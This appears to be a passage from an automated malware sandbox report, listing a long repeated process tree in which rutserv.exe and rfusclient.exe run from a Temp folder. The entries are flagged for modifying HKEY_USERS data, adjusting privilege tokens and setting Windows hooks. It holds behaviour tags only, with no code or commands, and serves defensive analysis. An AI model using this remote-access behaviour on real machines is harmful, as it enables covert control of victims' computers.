C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1980
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:792
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:940 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1184
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:840
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1548
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1408
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:700
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:564
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1604
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:2004
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:600
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1696
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:840
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1712
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1044
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1020
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:600 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1284
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1312
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1136
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:392 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1396
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:804 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1536
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1548
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:868
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1224
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:432
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1300
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1712
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1648
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1396 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:992 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1428
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1504
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:564
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1560
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:564 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:108
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1048
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1184
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1240
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:804
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1284
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1956
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:628
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1468
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:564 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:2008
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:976 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1304
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1620
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:700 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1416
-